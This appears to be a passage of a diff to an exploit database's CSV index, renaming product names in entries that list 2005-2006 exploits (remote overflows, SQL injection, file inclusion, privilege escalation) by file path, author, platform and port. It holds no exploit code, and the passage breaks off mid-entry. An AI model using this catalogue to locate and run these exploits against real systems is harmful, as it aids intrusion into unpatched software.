id,file,description,date,author,platform,type,port 1146,platforms/windows/remote/1146.c,"Microsoft Windows - Plug-and-Play Service Remote Overflow (MS05-039)",2005-08-11,sl0ppy,windows,remote,139 1147,platforms/windows/remote/1147.pm,"Veritas Backup Exec - Remote File Access Exploit (Windows) (Metasploit)",2005-08-11,anonymous,windows,remote,10000 1149,platforms/windows/remote/1149.c,"Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (MS05-039)",2005-08-12,houseofdabus,windows,remote,445 -1150,platforms/windows/remote/1150.pm,"ZENworks 6.5 Desktop/Server Management - Remote Stack Overflow (Metasploit)",2005-08-12,anonymous,windows,remote,1761 +1150,platforms/windows/remote/1150.pm,"Novell ZENworks 6.5 - Desktop/Server Management Remote Stack Overflow (Metasploit)",2005-08-12,anonymous,windows,remote,1761 1151,platforms/windows/remote/1151.pm,"MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow (Metasploit) (1)",2005-08-12,anonymous,windows,remote,143 1152,platforms/windows/remote/1152.pm,"Novell eDirectory 8.7.3 - iMonitor Remote Stack Overflow (Metasploit)",2005-08-12,anonymous,windows,remote,8008 1153,platforms/hardware/dos/1153.pl,"Grandstream Budge Tone 101/102 VOIP Phone - Denial of Service",2005-08-12,"Pierre Kroma",hardware,dos,0 @@ -965,7 +965,7 @@ id,file,description,date,author,platform,type,port 1161,platforms/windows/local/1161.c,"BakBone NetVault 7.1 - Privilege Escalation",2005-04-27,"Reed Arvin",windows,local,0 1162,platforms/windows/dos/1162.pl,"GoodTech SMTP Server 5.14 - Denial of Service",2005-06-07,"Reed Arvin",windows,dos,0 1163,platforms/windows/dos/1163.pl,"IA eMailServer Corporate Edition 5.2.2 - Denial of Service",2005-06-26,"Reed Arvin",windows,dos,0 -1164,platforms/windows/dos/1164.pl,"BusinessMail 4.60.00 - Remote Buffer Overflow",2005-07-30,"Reed Arvin",windows,dos,0 +1164,platforms/windows/dos/1164.pl,"BusinessMail Server 4.60.00 - Remote Buffer Overflow",2005-07-30,"Reed Arvin",windows,dos,0 1165,platforms/windows/dos/1165.pl,"Inframail Advantage Server Edition 6.0 <= 6.37 - (SMTP) Buffer Overflow",2005-06-27,"Reed Arvin",windows,dos,0 1166,platforms/windows/dos/1166.pl,"Inframail Advantage Server Edition 6.0 <= 6.37 - (FTP) Buffer Overflow",2005-06-27,"Reed Arvin",windows,dos,0 1167,platforms/solaris/remote/1167.pm,"Solaris 10 LPD - Arbitrary File Delete Exploit (Metasploit)",2005-08-19,Optyx,solaris,remote,0 @@ -1005,19 +1005,19 @@ id,file,description,date,author,platform,type,port 1207,platforms/php/webapps/1207.php,"Class-1 Forum 0.24.4 - Remote Code Execution",2005-09-09,rgod,php,webapps,0 1208,platforms/php/webapps/1208.pl,"phpMyFamily 1.4.0 - SQL Injection",2005-03-27,basher13,php,webapps,0 1209,platforms/linux/remote/1209.c,"GNU Mailutils imap4d 0.6 - 'Search' Remote Format String",2005-09-10,"Clément Lecigne",linux,remote,143 -1210,platforms/windows/remote/1210.pm,"WebAdmin 2.0.4 - USER Buffer Overflow (Metasploit)",2005-09-11,y0,windows,remote,1000 +1210,platforms/windows/remote/1210.pm,"Alt-N WebAdmin 2.0.4 - USER Buffer Overflow (Metasploit)",2005-09-11,y0,windows,remote,1000 1211,platforms/php/webapps/1211.pl,"PhpTagCool 1.0.3 - SQL Injection Attacks Exploit",2005-09-11,Megabyte,php,webapps,0 1212,platforms/windows/dos/1212.pl,"COOL! Remote Control 1.12 - Remote Denial of Service",2005-09-11,basher13,windows,dos,0 1213,platforms/multiple/dos/1213.c,"Snort 2.4.0 - SACK TCP Option Error Handling Denial of Service",2005-09-12,nitr0us,multiple,dos,0 1214,platforms/php/webapps/1214.php,"AzDGDatingLite 2.1.3 - Remote Code Execution",2005-09-13,rgod,php,webapps,0 -1215,platforms/linux/local/1215.c,"Wireless Tools 26 - (iwconfig) Privilege Escalation (some setuid)",2005-09-14,Qnix,linux,local,0 +1215,platforms/linux/local/1215.c,"Wireless Tools 26 (IWConfig) - Privilege Escalation (some setuid)",2005-09-14,Qnix,linux,local,0 1217,platforms/php/webapps/1217.pl,"phpWebSite 0.10.0 - (module) SQL Injection",2005-09-15,RusH,php,webapps,0 1218,platforms/windows/dos/1218.c,"Stoney FTPd - Denial of Service (rxBot mods ftpd)",2005-09-16,D-oNe,windows,dos,0 1219,platforms/php/webapps/1219.c,"PHP-Nuke 7.8 - 'modules.php' SQL Injection",2005-09-16,RusH,php,webapps,0 1220,platforms/windows/dos/1220.pl,"Fastream NETFile Web Server 7.1.2 - (HEAD) Denial of Service",2005-09-16,karak0rsan,windows,dos,0 1221,platforms/php/webapps/1221.php,"CuteNews 1.4.0 - (shell inject) Remote Command Execution",2005-09-17,rgod,php,webapps,0 1222,platforms/windows/dos/1222.pl,"MCCS (Multi-Computer Control Systems) Command - Denial of Service",2005-09-19,basher13,windows,dos,0 -1223,platforms/windows/remote/1223.c,"Mercury Mail 4.01a (Pegasus) - IMAP Buffer Overflow",2005-09-20,c0d3r,windows,remote,143 +1223,platforms/windows/remote/1223.c,"Mercury/32 Mail Server 4.01a (Pegasus) - IMAP Buffer Overflow",2005-09-20,c0d3r,windows,remote,143 1224,platforms/windows/remote/1224.html,"Mozilla Browsers - 0xAD (HOST:) Remote Heap Buffer Overrun Exploit (2)",2005-09-22,Skylined,windows,remote,0 1225,platforms/php/webapps/1225.php,"My Little Forum 1.5 - (SearchString) SQL Injection",2005-09-22,rgod,php,webapps,0 1226,platforms/php/webapps/1226.php,"phpMyFAQ 1.5.1 - (User-Agent) Remote Shell Injection",2005-09-23,rgod,php,webapps,0 @@ -1036,7 +1036,7 @@ id,file,description,date,author,platform,type,port 1240,platforms/php/webapps/1240.php,"Utopia News Pro 1.1.3 - 'news.php' SQL Injection",2005-10-06,rgod,php,webapps,0 1241,platforms/php/webapps/1241.php,"Cyphor 0.19 - (board takeover) SQL Injection",2005-10-08,rgod,php,webapps,0 1242,platforms/linux/remote/1242.pl,"xine-lib 1.1 - (media player library) Remote Format String",2005-10-10,"Ulf Harnhammar",linux,remote,0 -1243,platforms/windows/remote/1243.c,"CA iGateway - (debug mode) Remote Buffer Overflow",2005-10-10,egm,windows,remote,5250 +1243,platforms/windows/remote/1243.c,"CA iTechnology iGateway - (debug mode) Remote Buffer Overflow",2005-10-10,egm,windows,remote,5250 1244,platforms/php/webapps/1244.pl,"phpMyAdmin 2.6.4-pl1 - Directory Traversal",2005-10-10,cXIb8O3,php,webapps,0 1245,platforms/php/webapps/1245.php,"versatileBulletinBoard 1.00 RC2 - (board takeover) SQL Injection",2005-10-10,rgod,php,webapps,0 1246,platforms/windows/dos/1246.pl,"RBExplorer 1.0 - (Hijacking Command) Denial of Service",2005-10-11,basher13,windows,dos,0 @@ -1197,9 +1197,9 @@ id,file,description,date,author,platform,type,port 1445,platforms/linux/local/1445.c,"Eterm LibAST < 0.7 - '-X' Option Privilege Escalation",2006-01-24,"Johnny Mast",linux,local,0 1446,platforms/php/webapps/1446.pl,"creLoaded 6.15 - (HTMLAREA) Automated Perl Exploit",2006-01-24,kaneda,php,webapps,0 1447,platforms/hardware/dos/1447.c,"Cisco Aironet Wireless Access Points - Memory Exhaustion ARP Attack Denial of Service",2006-01-25,Pasv,hardware,dos,0 -1448,platforms/windows/remote/1448.pl,"Sami FTP Server 2.0.1 - Remote Stack Based Buffer Overflow (PoC)",2006-01-25,"Critical Security",windows,remote,0 +1448,platforms/windows/remote/1448.pl,"KarjaSoft Sami FTP Server 2.0.1 - Remote Stack Based Buffer Overflow (PoC)",2006-01-25,"Critical Security",windows,remote,0 1449,platforms/linux/local/1449.c,"SquirrelMail 3.1 - Change Passwd Plugin Local Buffer Overflow",2006-01-25,"rod hedor",linux,local,0 -1452,platforms/windows/remote/1452.pm,"Sami FTP Server 2.0.1 - Remote Buffer Overflow (Metasploit)",2006-01-25,redsand,windows,remote,21 +1452,platforms/windows/remote/1452.pm,"KarjaSoft Sami FTP Server 2.0.1 - Remote Buffer Overflow (Metasploit)",2006-01-25,redsand,windows,remote,21 1453,platforms/php/webapps/1453.pl,"Phpclanwebsite 1.23.1 - (par) SQL Injection",2006-01-25,matrix_killer,php,webapps,0 1455,platforms/windows/local/1455.txt,"Oracle Database Server 9i/10g - (XML) Buffer Overflow",2006-01-26,Argeniss,windows,local,0 1456,platforms/linux/remote/1456.c,"SHOUTcast 1.9.4 - File Request Format String (Leaked)",2006-01-28,crash-x,linux,remote,8000 @@ -1208,7 +1208,7 @@ id,file,description,date,author,platform,type,port 1459,platforms/php/webapps/1459.pl,"xeCMS 1.0.0 RC 2 - 'cookie' Remote Command Execution",2006-01-30,cijfer,php,webapps,0 1460,platforms/windows/remote/1460.pm,"Winamp 5.12 - '.pls' Remote Buffer Overflow (Metasploit)",2006-01-31,"H D Moore",windows,remote,0 1461,platforms/php/webapps/1461.pl,"Invision Power Board Dragoran Portal Mod 1.3 - SQL Injection",2006-01-31,SkOd,php,webapps,0 -1462,platforms/windows/remote/1462.cpp,"Sami FTP Server 2.0.1 - Remote Buffer Overflow (cpp)",2006-01-31,HolyGhost,windows,remote,21 +1462,platforms/windows/remote/1462.cpp,"KarjaSoft Sami FTP Server 2.0.1 - Remote Buffer Overflow (cpp)",2006-01-31,HolyGhost,windows,remote,21 1463,platforms/windows/remote/1463.pm,"SoftiaCom wMailServer 1.0 - SMTP Remote Buffer Overflow (Metasploit)",2006-02-01,y0,windows,remote,21 1464,platforms/hardware/dos/1464.c,"Arescom NetDSL-1000 - (TelnetD) Remote Denial of Service",2006-02-02,"Fabian Ramirez",hardware,dos,0 1465,platforms/windows/local/1465.c,"Microsoft Windows - ACLs Privilege Escalation (2)",2006-02-12,"Andres Tarasco",windows,local,0 @@ -1251,7 +1251,7 @@ id,file,description,date,author,platform,type,port 1505,platforms/windows/remote/1505.html,"Microsoft Windows Media Player 10 - Plugin Overflow (MS06-006)",2006-02-17,"Matthew Murphy",windows,remote,0 1506,platforms/windows/remote/1506.c,"Microsoft Windows - Color Management Module Overflow (MS05-036) (2)",2006-02-17,darkeagle,windows,remote,0 1508,platforms/cgi/webapps/1508.pl,"AWStats < 6.4 - (referer) Remote Command Execution",2006-02-17,RusH,cgi,webapps,0 -1509,platforms/php/webapps/1509.pl,"Zorum Forum 3.5 - (rollid) SQL Injection",2006-02-17,RusH,php,webapps,0 +1509,platforms/php/webapps/1509.pl,"Zorum Forum 3.5 - 'rollid' SQL Injection",2006-02-17,RusH,php,webapps,0 1510,platforms/php/webapps/1510.pl,"Gravity Board X 1.1 - (csscontent) Remote Code Execution",2006-02-17,RusH,php,webapps,0 1511,platforms/php/webapps/1511.php,"Coppermine Photo Gallery 1.4.3 - Remote Commands Execution Exploit",2006-02-17,rgod,php,webapps,0 1512,platforms/php/webapps/1512.pl,"Admbook 1.2.2 - 'x-forwarded-for' Remote Command Execution",2006-02-19,rgod,php,webapps,0 @@ -1272,7 +1272,7 @@ id,file,description,date,author,platform,type,port 1527,platforms/php/webapps/1527.pl,"iGENUS WebMail 2.0.2 - (config_inc.php) Remote Code Execution",2006-02-25,rgod,php,webapps,0 1528,platforms/asp/webapps/1528.pl,"Pentacle In-Out Board 6.03 - (newsdetailsview) SQL Injection",2006-02-25,nukedx,asp,webapps,0 1529,platforms/asp/webapps/1529.htm,"Pentacle In-Out Board 6.03 - 'login.asp' Remote Authentication Bypass",2006-02-25,nukedx,asp,webapps,0 -1530,platforms/php/webapps/1530.pl,"SaphpLesson 2.0 - (forumid) SQL Injection",2006-02-25,SnIpEr_SA,php,webapps,0 +1530,platforms/php/webapps/1530.pl,"saPHP Lesson 2.0 - (forumid) SQL Injection",2006-02-25,SnIpEr_SA,php,webapps,0 1531,platforms/windows/dos/1531.pl,"ArGoSoft FTP Server 1.4.3.5 - Remote Buffer Overflow (PoC)",2006-02-25,"Jerome Athias",windows,dos,0 1532,platforms/php/webapps/1532.pl,"PwsPHP 1.2.3 - 'index.php' SQL Injection",2006-02-25,papipsycho,php,webapps,0 1533,platforms/php/webapps/1533.php,"4Images 1.7.1 - (Local Inclusion) Remote Code Execution",2006-02-26,rgod,php,webapps,0 @@ -1463,7 +1463,7 @@ id,file,description,date,author,platform,type,port 1742,platforms/linux/remote/1742.c,"MySQL 4.1.18 / 5.0.20 - Local+Remote Information Leakage Exploit",2006-05-02,"Stefano Di Paola",linux,remote,0 1743,platforms/windows/dos/1743.pl,"Golden FTP Server Pro 2.70 - (APPE) Remote Buffer Overflow (PoC)",2006-05-03,"Jerome Athias",windows,dos,0 1744,platforms/php/webapps/1744.pl,"Albinator 2.0.6 - (Config_rootdir) Remote File Inclusion",2006-05-03,webDEViL,php,webapps,0 -1746,platforms/linux/dos/1746.pl,"zawhttpd 0.8.23 - (GET) Remote Buffer Overflow Denial of Service",2006-05-04,"Kamil Sienicki",linux,dos,0 +1746,platforms/linux/dos/1746.pl,"zawhttpd 0.8.23 - GET Remote Buffer Overflow Denial of Service",2006-05-04,"Kamil Sienicki",linux,dos,0 1747,platforms/php/webapps/1747.pl,"Auction 1.3m - 'phpbb_root_path' Remote File Inclusion",2006-05-04,webDEViL,php,webapps,0 1748,platforms/windows/dos/1748.py,"XM Easy Personal FTP Server 4.3 - 'USER' Remote Buffer Overflow (PoC)",2006-05-04,rewterz,windows,dos,0 1749,platforms/windows/dos/1749.pl,"acFTP FTP Server 1.4 - (USER) Remote Buffer Overflow (PoC)",2006-05-04,Preddy,windows,dos,0 @@ -1519,7 +1519,7 @@ id,file,description,date,author,platform,type,port 1804,platforms/php/webapps/1804.txt,"phpBazar 2.1.0 - Remote File Inclusion / Authentication Bypass",2006-05-19,[Oo],php,webapps,0 1805,platforms/php/webapps/1805.pl,"phpListPro 2.0.1 - 'Language' Remote Code Execution",2006-05-19,[Oo],php,webapps,0 1806,platforms/windows/local/1806.c,"IntelliTamper 2.07 - '.map' Local Arbitrary Code Execution (1)",2006-05-19,Devil-00,windows,local,0 -1807,platforms/asp/webapps/1807.txt,"Zix Forum 1.12 - (layid) SQL Injection",2006-05-19,FarhadKey,asp,webapps,0 +1807,platforms/asp/webapps/1807.txt,"Zix Forum 1.12 - 'layid' SQL Injection",2006-05-19,FarhadKey,asp,webapps,0 1808,platforms/php/webapps/1808.txt,"phpMyDirectory 10.4.4 - 'ROOT_PATH' Remote File Inclusion",2006-05-19,OLiBekaS,php,webapps,0 1809,platforms/php/webapps/1809.txt,"CaLogic Calendars 1.2.2 - (CLPath) Remote File Inclusion",2006-05-20,Kacper,php,webapps,0 1810,platforms/php/webapps/1810.pl,"Woltlab Burning Board 2.3.5 - (links.php) SQL Injection",2006-05-20,666,php,webapps,0 @@ -1596,7 +1596,7 @@ id,file,description,date,author,platform,type,port 1882,platforms/php/webapps/1882.pl,"Dmx Forum 2.1a - 'edit.php' Remote Password Disclosure",2006-06-05,DarkFig,php,webapps,0 1883,platforms/php/webapps/1883.txt,"Wikiwig 4.1 - (wk_lang.php) Remote File Inclusion",2006-06-06,Kacper,php,webapps,0 1884,platforms/asp/webapps/1884.htm,"myNewsletter 1.1.2 - (adminLogin.asp) Login Bypass",2006-06-06,FarhadKey,asp,webapps,0 -1885,platforms/windows/remote/1885.pl,"QBik Wingate 6.1.1.1077 - (POST) Remote Buffer Overflow",2006-06-07,kingcope,windows,remote,80 +1885,platforms/windows/remote/1885.pl,"QBik WinGate WWW Proxy Server 6.1.1.1077 - (POST) Remote Buffer Overflow",2006-06-07,kingcope,windows,remote,80 1886,platforms/php/webapps/1886.txt,"OpenEMR 2.8.1 - (fileroot) Remote File Inclusion",2006-06-07,Kacper,php,webapps,0 1887,platforms/php/webapps/1887.txt,"Xtreme/Ditto News 1.0 - (post.php) Remote File Inclusion",2006-06-07,Kacper,php,webapps,0 1888,platforms/php/webapps/1888.txt,"Back-End CMS 0.7.2.1 - (jpcache.php) Remote File Inclusion",2006-06-08,"Federico Fazzi",php,webapps,0 @@ -1636,7 +1636,7 @@ id,file,description,date,author,platform,type,port 1922,platforms/php/webapps/1922.php,"Joomla! 1.0.9 - (Weblinks) Blind SQL Injection",2006-06-17,rgod,php,webapps,0 1923,platforms/php/webapps/1923.txt,"Ad Manager Pro 2.6 - 'ipath' Remote File Inclusion",2006-06-17,Basti,php,webapps,0 1924,platforms/multiple/local/1924.txt,"Sun iPlanet Messaging Server 5.2 HotFix 1.16 - Root Password Disclosure",2006-06-18,php0t,multiple,local,0 -1925,platforms/php/webapps/1925.txt,"INDEXU 5.0.1 - (admin_template_path) Remote File Inclusion",2006-06-18,CrAsh_oVeR_rIdE,php,webapps,0 +1925,platforms/php/webapps/1925.txt,"Indexu 5.0.1 - (admin_template_path) Remote File Inclusion",2006-06-18,CrAsh_oVeR_rIdE,php,webapps,0 1926,platforms/php/webapps/1926.txt,"PHP Live Helper 1.x - 'abs_path' Remote File Inclusion",2006-06-18,SnIpEr_SA,php,webapps,0 1927,platforms/windows/dos/1927.pl,"Microsoft Excel - Unicode Local Overflow (PoC)",2006-06-18,kingcope,windows,dos,0 1928,platforms/php/webapps/1928.txt,"IdeaBox 1.1 - (gorumDir) Remote File Inclusion",2006-06-19,Kacper,php,webapps,0 @@ -1684,7 +1684,7 @@ id,file,description,date,author,platform,type,port 1971,platforms/php/webapps/1971.txt,"Randshop 1.1.1 - (header.inc.php) Remote File Inclusion",2006-07-01,OLiBekaS,php,webapps,0 1972,platforms/multiple/dos/1972.txt,"Opera Web Browser 9.00 - (iframe) Remote Denial of Service",2006-07-01,y3dips,multiple,dos,0 1973,platforms/osx/local/1973.pl,"Apple Mac OSX 10.4.6 (PPC) - 'launchd' Local Format String",2006-07-01,"Kevin Finisterre",osx,local,0 -1974,platforms/php/webapps/1974.txt,"SmartSiteCMS 1.0 - (root) Multiple Remote File Inclusion",2006-07-01,CrAsh_oVeR_rIdE,php,webapps,0 +1974,platforms/php/webapps/1974.txt,"SmartSite CMS 1.0 - (root) Multiple Remote File Inclusion",2006-07-01,CrAsh_oVeR_rIdE,php,webapps,0 1975,platforms/php/webapps/1975.pl,"BXCP 0.3.0.4 - (where) SQL Injection",2006-07-02,x23,php,webapps,0 1976,platforms/windows/dos/1976.cpp,"Quake 3 Engine Client - CG_ServerCommand() Remote Overflow",2006-07-02,RunningBon,windows,dos,0 1977,platforms/windows/dos/1977.cpp,"Quake 3 Engine Client (Windows x86) - CS_ITEms Remote Overflow",2006-07-02,RunningBon,windows,dos,0 @@ -1768,7 +1768,7 @@ id,file,description,date,author,platform,type,port 2064,platforms/php/webapps/2064.txt,"Mam-Moodle Mambo Component alpha - Remote File Inclusion",2006-07-23,jank0,php,webapps,0 2065,platforms/windows/local/2065.c,"Cheese Tracker 0.9.9 - Local Buffer Overflow (PoC)",2006-07-23,"Luigi Auriemma",windows,local,0 2066,platforms/php/webapps/2066.txt,"multibanners Mambo Component 1.0.1 - Remote File Inclusion",2006-07-23,Blue|Spy,php,webapps,0 -2067,platforms/solaris/local/2067.c,"Solaris 10 - sysinfo() Local Kernel Memory Disclosure",2006-07-24,prdelka,solaris,local,0 +2067,platforms/solaris/local/2067.c,"Solaris 10 sysinfo() - Local Kernel Memory Disclosure",2006-07-24,prdelka,solaris,local,0 2068,platforms/php/webapps/2068.php,"X7 Chat 2.0.4 - (old_prefix) Blind SQL Injection",2006-07-24,rgod,php,webapps,0 2069,platforms/php/webapps/2069.txt,"PrinceClan Chess Mambo Com 0.8 - Remote File Inclusion",2006-07-24,OLiBekaS,php,webapps,0 2070,platforms/windows/remote/2070.pl,"SIPfoundry sipXtapi - (CSeq) Remote Buffer Overflow",2006-07-24,"Jacopo Cervini",windows,remote,5060 @@ -1826,7 +1826,7 @@ id,file,description,date,author,platform,type,port 2124,platforms/windows/dos/2124.php,"XChat 2.6.7 - (Windows) Remote Denial of Service (PHP)",2006-08-07,ratboy,windows,dos,0 2125,platforms/php/webapps/2125.txt,"Joomla! Component JD-Wiki 1.0.2 - Remote File Inclusion",2006-08-07,jank0,php,webapps,0 2127,platforms/php/webapps/2127.txt,"ModernBill 1.6 - 'config.php' Remote File Inclusion",2006-08-07,Solpot,php,webapps,0 -2128,platforms/php/webapps/2128.txt,"SAPID CMS 1.2.3.05 - 'ROOT_PATH' Remote File Inclusion",2006-08-07,Kacper,php,webapps,0 +2128,platforms/php/webapps/2128.txt,"SAPID 1.2.3.05 - 'ROOT_PATH' Remote File Inclusion",2006-08-07,Kacper,php,webapps,0 2129,platforms/php/webapps/2129.txt,"SAPID Blog Beta 2 - 'ROOT_PATH' Remote File Inclusion",2006-08-07,Kacper,php,webapps,80 2130,platforms/php/webapps/2130.txt,"SAPID Gallery 1.0 - 'ROOT_PATH' Remote File Inclusion",2006-08-07,Kacper,php,webapps,80 2131,platforms/php/webapps/2131.txt,"SAPID Shop 1.2 - 'ROOT_PATH' Remote File Inclusion",2006-08-07,Kacper,php,webapps,80 @@ -1921,7 +1921,7 @@ id,file,description,date,author,platform,type,port 2221,platforms/php/webapps/2221.txt,"Fantastic News 2.1.3 - (script_path) Remote File Inclusion",2006-08-19,SHiKaA,php,webapps,0 2222,platforms/php/webapps/2222.txt,"Mambo com_lurm_constructor Component 0.6b - Include",2006-08-19,mdx,php,webapps,0 2223,platforms/windows/remote/2223.c,"Microsoft Windows - CanonicalizePathName() Remote Exploit (MS06-040)",2006-08-19,Preddy,windows,remote,139 -2224,platforms/php/webapps/2224.txt,"ZZ:FlashChat 3.1 - (adminlog) Remote File Inclusion",2006-08-19,SHiKaA,php,webapps,0 +2224,platforms/php/webapps/2224.txt,"ZZ:FlashChat 3.1 - 'adminlog' Remote File Inclusion",2006-08-19,SHiKaA,php,webapps,0 2225,platforms/php/webapps/2225.txt,"mambo com_babackup Component 1.1 - File Inclusion",2006-08-19,mdx,php,webapps,0 2226,platforms/php/webapps/2226.txt,"NES Game and NES System c108122 - File Inclusion",2006-08-20,Kacper,php,webapps,0 2227,platforms/php/webapps/2227.txt,"SportsPHool 1.0 - (mainnav) Remote File Inclusion",2006-08-20,Kacper,php,webapps,0 @@ -1930,11 +1930,11 @@ id,file,description,date,author,platform,type,port 2230,platforms/asp/webapps/2230.txt,"LBlog 1.05 - (comments.asp) SQL Injection",2006-08-20,"Chironex Fleckeri",asp,webapps,0 2231,platforms/php/webapps/2231.php,"Simple Machines Forum 1.1 rc2 (Windows) - (lngfile) Remote Exploit",2006-08-20,rgod,php,webapps,0 2232,platforms/php/webapps/2232.pl,"SimpleBlog 2.0 - 'comments.asp' SQL Injection (2)",2006-08-20,ASIANEAGLE,php,webapps,0 -2233,platforms/windows/remote/2233.c,"WFTPD 3.23 - (SIZE) Remote Buffer Overflow",2006-08-21,h07,windows,remote,21 +2233,platforms/windows/remote/2233.c,"Texas Imperial Software WFTPD 3.23 - (SIZE) Remote Buffer Overflow",2006-08-21,h07,windows,remote,21 2234,platforms/windows/remote/2234.py,"Easy File Sharing FTP Server 2.0 - (PASS) Remote Exploit (PoC)",2006-08-21,h07,windows,remote,21 2235,platforms/php/webapps/2235.txt,"PHProjekt 6.1 - (path_pre) Multiple Remote File Inclusion",2006-08-21,"the master",php,webapps,0 2236,platforms/php/webapps/2236.txt,"PHlyMail Lite 3.4.4 - (folderprops.php) Remote File Inclusion (2)",2006-08-21,Kw3[R]Ln,php,webapps,0 -2237,platforms/multiple/dos/2237.sh,"Apache < 1.3.37 / 2.0.59 / 2.2.3 - (mod_rewrite) Remote Overflow (PoC)",2006-08-21,"Jacobo Avariento",multiple,dos,0 +2237,platforms/multiple/dos/2237.sh,"Apache (mod_rewrite) < 1.3.37 / 2.0.59 / 2.2.3 - Remote Overflow (PoC)",2006-08-21,"Jacobo Avariento",multiple,dos,0 2238,platforms/windows/dos/2238.html,"Microsoft Internet Explorer - Multiple COM Object Color Property Denial of Service",2006-08-21,nop,windows,dos,0 2239,platforms/php/webapps/2239.txt,"Empire CMS 3.7 - (checklevel.php) Remote File Inclusion",2006-08-22,"Bob Linuson",php,webapps,0 2240,platforms/php/webapps/2240.txt,"HPE 1.0 - (HPEinc) Remote File Inclusion (2)",2006-08-22,"the master",php,webapps,0 @@ -1994,7 +1994,7 @@ id,file,description,date,author,platform,type,port 2294,platforms/asp/webapps/2294.txt,"Muratsoft Haber Portal 3.6 - (tr) SQL Injection",2006-09-03,ASIANEAGLE,asp,webapps,0 2295,platforms/php/webapps/2295.txt,"In-link 2.3.4 - (ADODB_DIR) Remote File Inclusion",2006-09-04,"Saudi Hackrz",php,webapps,0 2296,platforms/asp/webapps/2296.txt,"SimpleBlog 2.3 - 'id' SQL Injection",2006-09-04,Vipsta/MurderSkillz,asp,webapps,0 -2297,platforms/php/webapps/2297.pl,"Tr Forum 2.0 - SQL Injection / Bypass Security Restriction Exploit",2006-09-04,DarkFig,php,webapps,0 +2297,platforms/php/webapps/2297.pl,"TR Forum 2.0 - SQL Injection / Bypass Security Restriction Exploit",2006-09-04,DarkFig,php,webapps,0 2298,platforms/php/webapps/2298.php,"pHNews alpha 1 - (templates_dir) Remote Code Execution",2006-09-04,Kacper,php,webapps,0 2299,platforms/php/webapps/2299.php,"PHP Proxima 6 - completepack Remote Code Execution",2006-09-04,Kacper,php,webapps,0 2300,platforms/php/webapps/2300.pl,"SoftBB 0.1 - (cmd) Remote Command Execution",2006-09-04,DarkFig,php,webapps,0 @@ -2028,8 +2028,8 @@ id,file,description,date,author,platform,type,port 2328,platforms/windows/remote/2328.php,"RaidenHTTPD 1.1.49 - (SoftParserFileXml) Remote Code Execution",2006-09-08,rgod,windows,remote,80 2329,platforms/php/webapps/2329.txt,"Somery 0.4.6 - (skin_dir) Remote File Inclusion",2006-09-08,basher13,php,webapps,0 2330,platforms/solaris/local/2330.c,"X11R6 <= 6.4 XKEYBOARD (solaris/sparc) - Local Buffer Overflow (1)",2006-09-08,"RISE Security",solaris,local,0 -2331,platforms/solaris/local/2331.c,"X11R6 <= 6.4 XKEYBOARD (solaris/x86) - Local Buffer Overflow",2006-09-08,"RISE Security",solaris,local,0 -2332,platforms/sco/local/2332.c,"X11R6 <= 6.4 XKEYBOARD (sco/x86) - Local Buffer Overflow",2006-09-08,"RISE Security",sco,local,0 +2331,platforms/solaris/local/2331.c,"X11R6 <= 6.4 XKEYBOARD (solaris x86) - Local Buffer Overflow",2006-09-08,"RISE Security",solaris,local,0 +2332,platforms/sco/local/2332.c,"X11R6 <= 6.4 XKEYBOARD (sco x86) - Local Buffer Overflow",2006-09-08,"RISE Security",sco,local,0 2333,platforms/php/webapps/2333.php,"CCleague Pro 1.0.1RC1 - 'cookie' Remote Code Execution",2006-09-08,Kacper,php,webapps,0 2334,platforms/windows/dos/2334.py,"Multi-Threaded TFTP 1.1 - Long GET Request Denial of Service",2006-09-08,n00b,windows,dos,0 2335,platforms/php/webapps/2335.txt,"MyABraCaDaWeb 1.0.3 - (base) Remote File Inclusion",2006-09-08,ddoshomo,php,webapps,0 @@ -2051,7 +2051,7 @@ id,file,description,date,author,platform,type,port 2351,platforms/php/webapps/2351.txt,"Popper 1.41-r2 - (form) Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 2352,platforms/php/webapps/2352.txt,"webSPELL 4.01.01 - Database Backup Download",2006-09-12,Trex,php,webapps,0 2353,platforms/php/webapps/2353.txt,"Vitrax Pre-modded 1.0.6-r3 - Remote File Inclusion",2006-09-12,CeNGiZ-HaN,php,webapps,0 -2354,platforms/php/webapps/2354.txt,"Signkorn Guestbook 1.3 - (dir_path) Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 +2354,platforms/php/webapps/2354.txt,"Telekorn Signkorn Guestbook 1.3 - (dir_path) Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 2355,platforms/windows/remote/2355.pm,"Microsoft Windows 2003 - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)",2006-09-13,"Trirat Puttaraksa",windows,remote,445 2356,platforms/php/webapps/2356.txt,"Quicksilver Forums 1.2.1 - (set) Remote File Inclusion",2006-09-13,mdx,php,webapps,0 2357,platforms/php/webapps/2357.txt,"phpunity.postcard - (gallery_path) Remote File Inclusion",2006-09-13,Rivertam,php,webapps,0 @@ -2117,13 +2117,13 @@ id,file,description,date,author,platform,type,port 2417,platforms/php/webapps/2417.php,"Eskolar CMS 0.9.0.0 - 'index.php' SQL Injection",2006-09-22,"HACKERS PAL",php,webapps,0 2418,platforms/php/webapps/2418.php,"e-Vision CMS 2.0 - (all_users.php) SQL Injection",2006-09-22,"HACKERS PAL",php,webapps,0 2419,platforms/php/webapps/2419.txt,"Web-News 1.6.3 - (template.php) Remote File Inclusion",2006-09-24,Drago84,php,webapps,0 -2420,platforms/php/webapps/2420.txt,"ZoomStats 1.0.2 - (mysql.php) Remote File Inclusion",2006-09-24,Drago84,php,webapps,0 +2420,platforms/php/webapps/2420.txt,"ZoomStats 1.0.2 - 'mysql.php' Remote File Inclusion",2006-09-24,Drago84,php,webapps,0 2421,platforms/asp/webapps/2421.pl,"Spidey Blog Script 1.5 - 'proje_goster.asp' SQL Injection (2)",2006-09-24,gega,asp,webapps,0 2422,platforms/php/webapps/2422.txt,"Advaced-Clan-Script 3.4 - (mcf.php) Remote File Inclusion",2006-09-24,xdh,php,webapps,0 2423,platforms/asp/webapps/2423.txt,"iyzi Forum 1.0 Beta 3 - (uye_ayrinti.asp) SQL Injection",2006-09-24,"Fix TR",asp,webapps,0 2424,platforms/php/webapps/2424.txt,"SyntaxCMS 1.3 - (0004_init_urls.php) Remote File Inclusion",2006-09-24,MoHaJaLi,php,webapps,0 2425,platforms/windows/remote/2425.html,"Microsoft Internet Explorer (Windows XP SP2) - (VML) Remote Buffer Overflow",2006-09-24,jamikazu,windows,remote,0 -2426,platforms/windows/remote/2426.pl,"Microsoft Internet Explorer (VML) - 